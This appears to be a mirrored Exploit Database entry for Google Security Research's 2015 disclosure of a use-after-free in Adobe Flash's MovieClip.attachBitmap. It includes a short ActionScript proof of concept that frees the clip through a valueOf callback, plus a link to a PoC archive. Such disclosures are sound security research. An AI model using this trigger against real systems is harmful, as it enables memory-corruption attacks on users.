Adobe Flash MovieClip.attachBitmap – Use-After-Free

Exploit Database
118 阅读

作者： Google Security Research

日期： 2015-12-18
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/39040/

Source: https://code.google.com/p/google-security-research/issues/detail?id=593

There is a use-after-free in MovieClip.attachBitmap. If the depth parameter is an object with valueOf defined, this method can free the MovieClip, which is then used.

A minimal PoC follows:

this.createEmptyMovieClip("mc", 1);

var b = new flash.display.BitmapData(100, 100, true, 0x77777777);

mc.attachBitmap( b, {valueOf : func });

function func(){

mc.removeMovieClip();

// Fix heap here

return 5;

}

Proof of Concept:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39040.zip

last Exploits
Adobe Flash MovieClip.attachBitmap – Use-After-Free的更多信息

Angry IP Scanner 3.5.3 – Denial of Service (PoC)：
Microsoft Internet Explorer 9 – MSHTML CMarkup::ReloadInCompatView Use-After-Free：
Microsoft Windows 7 Kernel – ‘win32k!xxxClientLpkDrawTextEx’ Stack Memory Disclosure：
Restorator 1793 – Denial of Service (PoC)：
Microsoft DirectWrite / AFDKO – Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth：
Apple Mac OSX – io_service_close Use-After-Free：
Adobe Flash TextField.text Setter – Use-After-Free：
VSAXESS V2.6.2.70 build20171226_053 – ‘organization’ Denial of Service (PoC)：